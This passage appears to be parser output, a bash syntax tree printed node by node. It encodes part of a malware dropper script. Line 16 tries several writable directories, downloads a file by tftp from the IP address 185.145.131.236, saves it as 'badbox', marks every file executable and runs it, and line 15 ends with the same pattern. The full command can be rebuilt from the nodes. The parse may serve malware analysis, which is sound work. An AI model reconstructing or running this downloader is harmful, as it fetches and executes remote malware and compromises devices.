    WordNode(lineno=15, pos=(1529, 1531), word='+x'),
    WordNode(lineno=15, pos=(1532, 1533), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1533, 1534)),
  CommandNode(lineno=15, pos=(1534, 1542), parts=[
    WordNode(lineno=15, pos=(1534, 1542), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1543, 1668), parts=[
  CommandNode(lineno=16, pos=(1543, 1550), parts=[
    WordNode(lineno=16, pos=(1543, 1545), word='cd'),
    WordNode(lineno=16, pos=(1546, 1550), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1551, 1553)),
  CommandNode(lineno=16, pos=(1554, 1565), parts=[
    WordNode(lineno=16, pos=(1554, 1556), word='cd'),
    WordNode(lineno=16, pos=(1557, 1565), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1566, 1568)),
  CommandNode(lineno=16, pos=(1569, 1576), parts=[
    WordNode(lineno=16, pos=(1569, 1571), word='cd'),
    WordNode(lineno=16, pos=(1572, 1576), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1577, 1579)),
  CommandNode(lineno=16, pos=(1580, 1588), parts=[
    WordNode(lineno=16, pos=(1580, 1582), word='cd'),
    WordNode(lineno=16, pos=(1583, 1588), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1589, 1591)),
  CommandNode(lineno=16, pos=(1592, 1596), parts=[
    WordNode(lineno=16, pos=(1592, 1594), word='cd'),
    WordNode(lineno=16, pos=(1595, 1596), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1596, 1597)),
  CommandNode(lineno=16, pos=(1598, 1630), parts=[
    WordNode(lineno=16, pos=(1598, 1602), word='tftp'),
    WordNode(lineno=16, pos=(1603, 1605), word='-r'),
    WordNode(lineno=16, pos=(1606, 1611), word='IOK13'),
    WordNode(lineno=16, pos=(1612, 1614), word='-g'),
    WordNode(lineno=16, pos=(1615, 1630), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1630, 1631)),
  CommandNode(lineno=16, pos=(1631, 1648), parts=[
    WordNode(lineno=16, pos=(1631, 1634), word='cat'),
    WordNode(lineno=16, pos=(1635, 1640), word='IOK13'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1642, 1648), word='badbox'), pos=(1641, 1648), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1648, 1649)),
  CommandNode(lineno=16, pos=(1649, 1659), parts=[
    WordNode(lineno=16, pos=(1649, 1654), word='chmod'),
    WordNode(lineno=16, pos=(1655, 1657), word='+x'),
    WordNode(lineno=16, pos=(1658, 1659), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1659, 1660)),
  CommandNode(lineno=16, pos=(1660, 1668), parts=[
    WordNode(lineno=16, pos=(1660, 1668), word='./badbox'),
  ]),
])
